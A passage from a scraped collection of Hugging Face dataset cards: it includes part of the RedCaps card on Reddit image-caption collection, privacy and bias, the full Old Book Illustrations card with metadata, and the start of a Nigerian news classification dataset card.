subreddit moderators) to avoid pornographic or disturbing content.\nStep 3. Caption cleaning: We expect Reddit post titles to be less noisy than other large-scale\nsources of image captions such as alt-text [2, 31], so we apply minimal text cleaning. We lowercase\ncaptions and use ftfy [44] to remove character accents, emojis, and non-latin characters, following\n[29, 35, 36]. Then we apply simple pattern matching to discard all sub-strings enclosed in brackets\n((.*), [.*]). These sub-strings usually give non-semantic information: original content tags [oc],\nimage resolutions (800x600 px), camera specs (shot with iPhone), self-promotion [Instagram:\n@user], and other references (link in comments). Finally, like [31] we replace social media\nhandles (words starting with ‘@’) with a [USR] token to protect user privacy and reduce redundancy.\nDue to such filtering, ≈12K (0.1%) captions in our dataset are empty strings. We do not discard them,\nas subreddit names alone provide meaningful supervision. Unlike CC-3M or CC-12M that discard\ncaptions without nouns or that don’t overlap image tags, we do not discard any instances in this step.\nThrough this pipeline, we collect 13.4M instances from 350 subreddits. Our collection pipeline is\nless resource-intensive than existing datasets – we do not require webpage crawlers, search engines,\nor large databases of indexed webpages. RedCaps is easily extensible in the future by selecting more\nsubreddits and collecting posts from future years. Next, we perform additional filtering to mitigate\nuser privacy risks and harmful stereotypes in RedCaps, resulting in final size of 12M instances.",
"#### Who are the source language producers?\n\nReddit is the singular data source for RedCaps.",
"### Annotations",
"#### Annotation process\n\nThe dataset is built using fully automatic data collection pipeline which doesn't require any human annotators.",
"#### Who are the annotators?\n\nThe annotation process doesn't require any human annotators.",
"### Personal and Sensitive Information\n\nFrom the paper:\n> Does the dataset relate to people?\nThe dataset pertains to people in that people wrote the captions and posted images to Reddit\nthat we curate in RedCaps. We made specific design choices while curating RedCaps to avoid\nlarge quantities of images containing people:\n(a) We collect data from manually curated subreddits in which most contain primarily pertains\nto animals, objects, places, or activities. We exclude all subreddits whose primary purpose\nis to share and describe images of people (such as celebrity photos or user selfies).\n(b) We use an off-the-shelf face detector to find and remove images with potential presence of\nhuman faces. We manually checked 50K random images in RedCaps (Q16) and found 79\nimages with identifiable human faces – the entire dataset may have ≈19K (0.15%) images\nwith identifiable people. Refer Section 2.2 in the main paper.\n\n> Is it possible to identify one or more natural persons, either directly or indirectly (i.e., in\ncombination with other data) from the dataset? \nYes, all instances in RedCaps include Reddit usernames of their post authors. This could be\nused to look up the Reddit user profile, and some Reddit users may have identifying information\nin their profiles. Some images may contain human faces which could be identified by\nappearance. However, note that all this information is already public on Reddit, and searching it\nin RedCaps is no easier than searching directly on Reddit.\n\n> Were the individuals in question notified about the data collection?\nNo. Reddit users are anonymous by default, and are not required to share their personal contact\ninformation (email, phone numbers, etc.). Hence, the only way to notify the authors of RedCaps\nimage posts is by sending them private messages on Reddit. This is practically difficult to do\nmanually, and will be classified as spam and blocked by Reddit if attempted to programmatically\nsend a templated message to millions of users.\n\n> Did the individuals in question consent to the collection and use of their data?\nUsers did not explicitly consent to the use of their data in our dataset. However, by uploading\ntheir data on Reddit, they consent that it would appear on the Reddit plaform and will be\naccessible via the official Reddit API (which we use to collect RedCaps).\n\n> If consent was obtained, were the consenting individuals provided with a mechanism to\nrevoke their consent in the future or for certain uses?\nUsers have full control over the presence of their data in our dataset. If users wish to revoke\ntheir consent, they can delete the underlying Reddit post – it will be automatically removed\ndfrom RedCaps since we distributed images as URLs. Moreover, we provide an opt-out request\nform on our dataset website for anybody to request removal of an individual instance if it is\npotentially harmful (e.g. NSFW, violates privacy, harmful stereotypes, etc.).",
"## Considerations for Using the Data",
"### Social Impact of Dataset\n\nFrom the paper:\n> Has an analysis of the potential impact of the dataset and its use on data subjects (e.g.,\na data protection impact analysis) been conducted?\nNo.",
"### Discussion of Biases\n\nFrom the paper:\n> Harmful Stereotypes: Another concern with\nReddit data is that images or language may represent harmful stereotypes about gender, race, or other\ncharacteristics of people [48, 49, 51]. We select only non-NSFW subreddits with active moderation\nfor collecting data. This stands in contrast to less curated uses of Reddit data, such as GPT-2 [35]\nwhose training data includes at least 63K documents from banned or quarantined subreddits which\nmay contain toxic language [53]. We attempt to further reduce harmful stereotypes in two ways:\n> * NSFW images: We use the InceptionV3 [54] model from [55] to filter images detected as porn or hentai with confidence ≥ 0.9. Similar to face filtering, we estimated precision of our filtering and estimated amount of missed detections, shown in Table 1. The model detects 87K images with low\nprecision (∼1%) – most detections are non-NSFW images with pink and beige hues.\n> * Potentially derogatory language: We filter instances whose captions contain words or phrases from a common blocklist [56]. It is important to note that such coarse filtering might suppress language from marginalized groups reclaiming slurs [51]; however, as RedCaps is not intended to describe people, we believe this is a pragmatic tradeoff to avoid propagating harmful labels.\n\n> Reddit demographics: Reddit’s user demographics are not representative of the population at large.\nCompared to US adults, Reddit users skew male (69% vs 49%), young (58% 18-29 years old vs\n22%), college educated (36% vs 28%), and politically liberal (41% vs 25%) [57]. Reddit users\nare predominantly white (63%) [57], and 49% of desktop traffic to Reddit comes from the United\nStates [58]. All of the subreddits in RedCaps use English as their primary language. Taken together,\nthese demographic biases likely also bias the types of objects and places that appear in images on\nReddit, and the language used to describe these images. We do not offer explicit countermeasures to\nthese biases, but users of RedCaps should keep in mind that size doesn’t guarantee diversity [51].\nSubtler issues may also exist, such as imbalanced representation of demographic groups [59] or\ngender bias in object co-occurrence [60] or language [61]. These are hard to control in internet\ndata, so we release RedCaps with explicit instructions on suitable use-cases; specifically requesting models not be trained to identify people, or make decisions that impact people. We document these instructions and other terms-of-use in a datasheet [45], provided in Appendix G.\n\n> Does the dataset contain data that, if viewed directly, might be offensive, insulting, threatening, or might otherwise cause anxiety?\nThe scale of RedCaps means that we are unable to verify the contents of all images and\ncaptions. However we have tried to minimize the possibility that RedCaps contains data that\nmight be offensive, insulting, threatening, or might cause anxiety via the following mitigations:\n(a) We manually curate the set of subreddits from which to collect data; we only chose\nsubreddits that are not marked NSFW and which generally contain non-offensive content.\n(b) Within our curated subreddits, we did not include any posts marked NSFW.\n(c) We removed all instances whose captions contained any of the 400 potentially offensive\nwords or phrases. Refer Section 2.2 in the main paper.\n(d) We remove all instances whose images were flagged NSFW by an off-the-shelf detector.\nWe manually checked 50K random images in RedCaps and found one image containing\nnudity (exposed buttocks; no identifiable face). Refer Section 2.2 in the main paper\n\n> Does the dataset identify any subpopulations (e.g., by age, gender)?\nRedCaps does not explicitly identify any subpopulations. Since some images contain people\nand captions are free-form natural language written by Reddit users, it is possible that some\ncaptions may identify people appearing in individual images as part of a subpopulation.\n\n> Were any ethical review processes conducted (e.g., by an institutional review board)?\nWe did not conduct a formal ethical review process via institutional review boards. However,\nas described in Section 2.2 of the main paper and Q16 we employed several filtering mechanisms\nto try and remove instances that could be problematic.",
"### Other Known Limitations\n\nFrom the paper:\n> Are there any errors, sources of noise, or redundancies in the dataset?\nRedCaps is noisy by design since image-text pairs on the internet are noisy and unstructured.\nSome instances may also have duplicate images and captions – Reddit users may have shared\nthe same image post in multiple subreddits. Such redundancies constitute a very small fraction\nof the dataset, and should have almost no effect in training large-scale models.\n\n> Does the dataset contain data that might be considered confidential (e.g., data that is\nprotected by legal privilege or by doctor-patient confidentiality, data that includes the\ncontent of individuals non-public communications)?\nNo, the subreddits included in RedCaps do not cover topics that may be considered confidential. All posts were publicly shared on Reddit prior to inclusion in RedCaps.",
"## Additional Information",
"### Dataset Curators\n\nFrom the paper:\n> Four researchers at the University of Michigan (affiliated as of 2021) have created RedCaps:\nKaran Desai, Gaurav Kaul, Zubin Aysola, and Justin Johnson.",
"### Licensing Information\n\nThe image metadata is licensed under CC-BY 4.0 license. Additionally, uses of this dataset are subject to Reddit API terms (URL\napi-terms) and users must comply with Reddit User Agreeement, Content Policy,\nand Privacy Policy – all accessible at URL\n\nFrom the paper:\n> RedCaps should only be used for non-commercial research. RedCaps should not be used for any tasks that involve identifying features related to people (facial recognition, gender, age, ethnicity identification, etc.) or make decisions that impact people (mortgages, job applications, criminal sentences; or moderation decisions about user-uploaded data that could result in bans from a website). Any commercial and for-profit uses of RedCaps are restricted – it should not be used to train models that will be deployed in production systems as part of a product offered by businesses or government agencies.",
"### Contributions\n\nThanks to @mariosasko for adding this dataset."
] |
40cc352405da6da57bd64ba785bd6a38ef3a4871 |
# Dataset Card for Old Book Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Discussion of Biases](#discussion-of-biases)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **[Homepage](https://www.oldbookillustrations.com/)**
### Dataset Summary
The Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website [Old Book Illustrations](https://www.oldbookillustrations.com/).
The webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the [BigLAM initiative](https://huggingface.co/biglam).
### Languages
The captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.
For instance you can find this description that contains a French sentence:
>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.
## Dataset Structure
Each row contains information gathered from the page of an illustration on the website [Old Book Illustrations](https://www.oldbookillustrations.com/). As of July 2022, there are 4172 illustrations in this dataset.
### Data Fields
* `rawscan`: the image as originally scanned from the book, without further processing
* `1600px`: the cleaned image, resized to a width of 1600 pixels (height can vary)
* `info_url`: URL to the illustration page on oldbookillustrations.com
* `ìnfo_src`: URL to an icon-sized version of the image
* `info_alt`: short description of the image
* `artist_name`: artist name
* `artist_date`: birth date of the artist
* `artist_countries`: list of the countries the artist is from
* `book_title`: original title of the book the illustration is extracted from
* `book_authors`: list of the authors of the book
* `book_publishers`: list of the publishers of the book
* `openlibrary-url`: URL to the openlibrary entry for the book
* `tags`: list of keywords for this illustration on oldbookillustrations.com
* `illustration_source_name`: list of the sources for this illustration
* `illustration_source_url`: list of the URL for these sources
* `illustration_subject`: category of the subject represented in the illustration
* `illustration_format`: category of the format of the illustration
* `image_title`: title of the image
* `image_caption`: caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language
* `image_description`: longer description of the image. If there is one, it also quotes the caption in the original language
* `rawscan_url`: URL to the rawscan image on oldbookillustration.com
* `1600px_url`: URL to the cleaned image on oldbookillustration.com
## Dataset Creation
### Curation Rationale
This collection was collected & curated by the team of the website [Old Book Illustrations](https://www.oldbookillustrations.com/).
This version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check [Old Book Illustrations](https://www.oldbookillustrations.com/).
### Source Data
#### Initial Data Collection and Normalization
Initial data is gathered from the website [Old Book Illustrations](https://www.oldbookillustrations.com/). The sources of the illustration scans are specified for each entry in the columns `illustration_source_name` and `illustration_source_url`.
### Personal and Sensitive Information
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Considerations for Using the Data
### Discussion of Biases
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Additional Information
### Dataset Curators
The Old Book Illustrations collection is curated and maintained by the team of the [Old Book Illustrations website](https://www.oldbookillustrations.com/).
### Licensing Information
[Old Book Illustrations](https://www.oldbookillustrations.com/) website reads:
>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
The Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from [*Early poems of William Morris*](https://www.oldbookillustrations.com/titles/early-poems-of-william-morris/) as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or [*Under the hill*](https://www.oldbookillustrations.com/titles/under-the-hill/) which was published in the US in 1928 and therefore is not public domain there.
### Citation Information
```bibtex
@misc{old book illustrations_2007,
url={https://www.oldbookillustrations.com/},
journal={Old Book Illustrations}, year={2007}}
```
### Contributions
Thanks to [@gigant](https://huggingface.co/gigant) ([@giganttheo](https://github.com/giganttheo)) for adding this dataset. | gigant/oldbookillustrations | [
"task_categories:text-to-image",
"task_categories:image-to-text",
"task_categories:image-to-image",
"task_ids:image-captioning",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:en",
"language:fr",
"language:de",
"license:cc-by-nc-4.0",
"lam",
"1800-1900",
"region:us"
] | 2022-07-28T07:31:19+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["en", "fr", "de"], "license": ["cc-by-nc-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-to-image", "image-to-text", "image-to-image"], "task_ids": ["image-captioning"], "pretty_name": "Old Book Illustrations", "tags": ["lam", "1800-1900"], "dataset_info": {"features": [{"name": "rawscan", "dtype": "image"}, {"name": "1600px", "dtype": "image"}, {"name": "info_url", "dtype": "string"}, {"name": "info_src", "dtype": "string"}, {"name": "info_alt", "dtype": "string"}, {"name": "artist_name", "dtype": "string"}, {"name": "artist_birth_date", "dtype": "string"}, {"name": "artist_death_date", "dtype": "string"}, {"name": "artist_countries", "sequence": "string"}, {"name": "book_title", "dtype": "string"}, {"name": "book_authors", "sequence": "string"}, {"name": "book_publishers", "sequence": "string"}, {"name": "date_published", "dtype": "string"}, {"name": "openlibrary-url", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "illustration_source_name", "sequence": "string"}, {"name": "illustration_source_url", "sequence": "string"}, {"name": "illustration_subject", "dtype": "string"}, {"name": "illustration_format", "dtype": "string"}, {"name": "engravers", "sequence": "string"}, {"name": "image_title", "dtype": "string"}, {"name": "image_caption", "dtype": "string"}, {"name": "image_description", "dtype": "string"}, {"name": "rawscan_url", "dtype": "string"}, {"name": "1600px_url", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 6402149401.7, "num_examples": 4154}], "download_size": 5098832185, "dataset_size": 6402149401.7}} | 2023-12-18T13:39:10+00:00 | [] | [
"en",
"fr",
"de"
] | TAGS
#task_categories-text-to-image #task_categories-image-to-text #task_categories-image-to-image #task_ids-image-captioning #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1K<n<10K #source_datasets-original #language-English #language-French #language-German #license-cc-by-nc-4.0 #lam #1800-1900 #region-us
|
# Dataset Card for Old Book Illustrations
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Dataset Creation
- Curation Rationale
- Source Data
- Personal and Sensitive Information
- Considerations for Using the Data
- Discussion of Biases
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage
### Dataset Summary
The Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website Old Book Illustrations.
The webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the BigLAM initiative.
### Languages
The captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.
For instance you can find this description that contains a French sentence:
>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.
## Dataset Structure
Each row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.
### Data Fields
* 'rawscan': the image as originally scanned from the book, without further processing
* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)
* 'info_url': URL to the illustration page on URL
* 'ìnfo_src': URL to an icon-sized version of the image
* 'info_alt': short description of the image
* 'artist_name': artist name
* 'artist_date': birth date of the artist
* 'artist_countries': list of the countries the artist is from
* 'book_title': original title of the book the illustration is extracted from
* 'book_authors': list of the authors of the book
* 'book_publishers': list of the publishers of the book
* 'openlibrary-url': URL to the openlibrary entry for the book
* 'tags': list of keywords for this illustration on URL
* 'illustration_source_name': list of the sources for this illustration
* 'illustration_source_url': list of the URL for these sources
* 'illustration_subject': category of the subject represented in the illustration
* 'illustration_format': category of the format of the illustration
* 'image_title': title of the image
* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language
* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language
* 'rawscan_url': URL to the rawscan image on URL
* '1600px_url': URL to the cleaned image on URL
## Dataset Creation
### Curation Rationale
This collection was collected & curated by the team of the website Old Book Illustrations.
This version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.
### Source Data
#### Initial Data Collection and Normalization
Initial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.
### Personal and Sensitive Information
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Considerations for Using the Data
### Discussion of Biases
The Old Book Illustrations' Terms and conditions reads:
>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.
## Additional Information
### Dataset Curators
The Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.
### Licensing Information
Old Book Illustrations website reads:
>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
The Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from *Early poems of William Morris* as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or *Under the hill* which was published in the US in 1928 and therefore is not public domain there.
### Contributions
Thanks to @gigant (@giganttheo) for adding this dataset. | [
"# Dataset Card for Old Book Illustrations",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Discussion of Biases\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage",
"### Dataset Summary\n\nThe Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website Old Book Illustrations.\nThe webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the BigLAM initiative.",
"### Languages\n\nThe captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.\nFor instance you can find this description that contains a French sentence:\n\n>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.",
"## Dataset Structure\n\nEach row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.",
"### Data Fields\n\n* 'rawscan': the image as originally scanned from the book, without further processing\n* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)\n* 'info_url': URL to the illustration page on URL\n* 'ìnfo_src': URL to an icon-sized version of the image\n* 'info_alt': short description of the image\n* 'artist_name': artist name\n* 'artist_date': birth date of the artist\n* 'artist_countries': list of the countries the artist is from\n* 'book_title': original title of the book the illustration is extracted from\n* 'book_authors': list of the authors of the book\n* 'book_publishers': list of the publishers of the book\n* 'openlibrary-url': URL to the openlibrary entry for the book\n* 'tags': list of keywords for this illustration on URL\n* 'illustration_source_name': list of the sources for this illustration\n* 'illustration_source_url': list of the URL for these sources\n* 'illustration_subject': category of the subject represented in the illustration\n* 'illustration_format': category of the format of the illustration\n* 'image_title': title of the image\n* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language\n* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language\n* 'rawscan_url': URL to the rawscan image on URL\n* '1600px_url': URL to the cleaned image on URL",
"## Dataset Creation",
"### Curation Rationale\n\nThis collection was collected & curated by the team of the website Old Book Illustrations.\nThis version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nInitial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.",
"### Personal and Sensitive Information\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Considerations for Using the Data",
"### Discussion of Biases\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Additional Information",
"### Dataset Curators\n\nThe Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.",
"### Licensing Information\n\nOld Book Illustrations website reads:\n>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\nThe Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from *Early poems of William Morris* as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or *Under the hill* which was published in the US in 1928 and therefore is not public domain there.",
"### Contributions\n\nThanks to @gigant (@giganttheo) for adding this dataset."
] | [
"TAGS\n#task_categories-text-to-image #task_categories-image-to-text #task_categories-image-to-image #task_ids-image-captioning #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1K<n<10K #source_datasets-original #language-English #language-French #language-German #license-cc-by-nc-4.0 #lam #1800-1900 #region-us \n",
"# Dataset Card for Old Book Illustrations",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Discussion of Biases\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage",
"### Dataset Summary\n\nThe Old Book Illustrations contains 4172 illustrations scanned from old books, this collection was collected & curated by the team of the website Old Book Illustrations.\nThe webmaster of Old Book Illustrations kindly allowed us to scrap these information in order to create this dataset for the BigLAM initiative.",
"### Languages\n\nThe captions and descriptions are mostly in English but can contain some sentences from other languages such as French or German.\nFor instance you can find this description that contains a French sentence:\n\n>The caption reads in the original French: Vue de l’aqueduc de Salones qui conduisait l’eau à Spalatro.",
"## Dataset Structure\n\nEach row contains information gathered from the page of an illustration on the website Old Book Illustrations. As of July 2022, there are 4172 illustrations in this dataset.",
"### Data Fields\n\n* 'rawscan': the image as originally scanned from the book, without further processing\n* '1600px': the cleaned image, resized to a width of 1600 pixels (height can vary)\n* 'info_url': URL to the illustration page on URL\n* 'ìnfo_src': URL to an icon-sized version of the image\n* 'info_alt': short description of the image\n* 'artist_name': artist name\n* 'artist_date': birth date of the artist\n* 'artist_countries': list of the countries the artist is from\n* 'book_title': original title of the book the illustration is extracted from\n* 'book_authors': list of the authors of the book\n* 'book_publishers': list of the publishers of the book\n* 'openlibrary-url': URL to the openlibrary entry for the book\n* 'tags': list of keywords for this illustration on URL\n* 'illustration_source_name': list of the sources for this illustration\n* 'illustration_source_url': list of the URL for these sources\n* 'illustration_subject': category of the subject represented in the illustration\n* 'illustration_format': category of the format of the illustration\n* 'image_title': title of the image\n* 'image_caption': caption of the image. Seems to be the caption that appears next to the image in the book, translated to English if in another language\n* 'image_description': longer description of the image. If there is one, it also quotes the caption in the original language\n* 'rawscan_url': URL to the rawscan image on URL\n* '1600px_url': URL to the cleaned image on URL",
"## Dataset Creation",
"### Curation Rationale\n\nThis collection was collected & curated by the team of the website Old Book Illustrations.\nThis version contains all the data that was available on the website as of July 2022, but the website is being actively maintained so if you want more old book illustrations, make sure to check Old Book Illustrations.",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nInitial data is gathered from the website Old Book Illustrations. The sources of the illustration scans are specified for each entry in the columns 'illustration_source_name' and 'illustration_source_url'.",
"### Personal and Sensitive Information\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Considerations for Using the Data",
"### Discussion of Biases\n\nThe Old Book Illustrations' Terms and conditions reads:\n>OBI [Old Book Illustrations] explores the art of book illustrations within boundaries defined by time and age, not by subject, treatment, or intent. This means that some illustrations might be deemed offensive, disturbing, misleading, or otherwise objectionable. We do not endorse views or opinions the Illustrations may express, neither do we guarantee that the information conveyed by any Illustration is accurate.",
"## Additional Information",
"### Dataset Curators\n\nThe Old Book Illustrations collection is curated and maintained by the team of the Old Book Illustrations website.",
"### Licensing Information\n\nOld Book Illustrations website reads:\n>We don’t limit the use of the illustrations available on our site, but we accept no responsibility regarding any problem, legal or otherwise, which might result from such use. More specifically, we leave it up to users to make sure that their project complies with the copyright laws of their country of residence. Text content (descriptions, translations, etc.) is published under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.\n\nThe Old Book Illustrations webmaster mentioned that most images are public domain in the US and Europe, but there can be some exceptions. An example are the illustrations from *Early poems of William Morris* as the illustrator died 1955, so her work is not public domain in Europe as of 2022, or *Under the hill* which was published in the US in 1928 and therefore is not public domain there.",
"### Contributions\n\nThanks to @gigant (@giganttheo) for adding this dataset."
] |
2c53f4b94137892d96c3bc4272028c3354c640a7 |
# Dataset Card for news-data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Dataset Curators](#dataset-curators)
### Dataset Summary
The News Dataset is an English-language dataset containing just over 4k unique news articles scrapped from AriseTv- One of the most popular news television in Nigeria.
### Supported Tasks and Leaderboards
It supports news article classification into different categories.
### Languages
English
## Dataset Structure
### Data Instances
'''
{'Title': 'Nigeria: APC Yet to Zone Party Positions Ahead of Convention'
'Excerpt': 'The leadership of the All Progressives Congress (APC), has denied reports that it had zoned some party positions ahead of'
'Category': 'politics'
'labels': 2}
'''
### Data Fields
* Title: a string containing the title of a news title as shown
* Excerpt: a string containing a short extract from the body of the news
* Category: a string that tells the category of an example (string label)
* labels: integer telling the class of an example (label)
### Data Splits
| Dataset Split | Number of instances in split |
| ----------- | ----------- |
| Train | 4,594 |
| Paragraph | 811 |
## Dataset Creation
### Source Data
#### Initial Data Collection and Normalization
The code for the dataset creation at *https://github.com/chimaobi-okite/NLP-Projects-Competitions/blob/main/NewsCategorization/Data/NewsDataScraping.ipynb*. The examples were scrapped from
<https://www.arise.tv/>
### Annotations
#### Annotation process
The annotation is based on the news category in the [arisetv](https://www.arise.tv) website
#### Who are the annotators?
Journalists at arisetv
## Considerations for Using the Data
### Social Impact of Dataset
The purpose of this dataset is to help develop models that can classify news articles into categories.
This task is useful for efficiently presenting information given a large quantity of text. It should be made clear that any summarizations produced by models trained on this dataset are reflective of the language used in the articles, but are in fact automatically generated.
### Discussion of Biases
This data is biased towards news happenings in Nigeria but the model built using it can as well classify news from other parts of the world
with a slight degradation in performance.
### Dataset Curators
The dataset is created by people at arise but was scrapped by [@github-chimaobi-okite](https://github.com/chimaobi-okite/)
| okite97/news-data | [
"task_categories:text-classification",
"task_ids:topic-classification",
"task_ids:multi-class-classification",
"annotations_creators:other",
"language_creators:found",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:en",
"license:afl-3.0",
"region:us"
